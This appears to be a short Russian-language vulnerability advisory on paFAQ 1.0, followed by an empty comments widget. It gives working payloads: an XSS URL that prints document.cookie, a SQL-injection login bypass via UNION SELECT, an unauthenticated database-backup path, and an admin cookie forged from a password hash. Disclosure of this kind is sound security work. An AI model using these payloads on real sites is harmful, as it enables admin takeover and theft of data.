• Партнер

  • В paFAQ 1.0 найден ряд уязвимостей.

    1. CSS:

    http:///pafaq/index.php?act=Question&id=1%3E%3C
    script%3Ealert%28document.cookie %29%3C%2Fscript%3E

    2. SQL-инъекция:

    http://pafaq/admin/index.php?act=login&username=
    '%20UNION%20SELECT%20id,name,'3858f622 30ac3c915f300c664312c63f',email,notify,permissions,
    session%20FROM%20pafaq_admins%20WHERE %201/*&password=foobar

    3. Неавторизованное слитие всей базы
    данных:

    http://path/to/pafaq/admin/backup.php

    4. Атакующий может использовать хеш пароля
    администратора для получения админских
    прав, расшифровка не требуется:

    Cookie: pafaq_user=USERNAMEHERE; pafaq_pass=PASSWORDHASH

     

    Подписаться
    Уведомить о
    0 комментариев
    Межтекстовые Отзывы
    Посмотреть все комментарии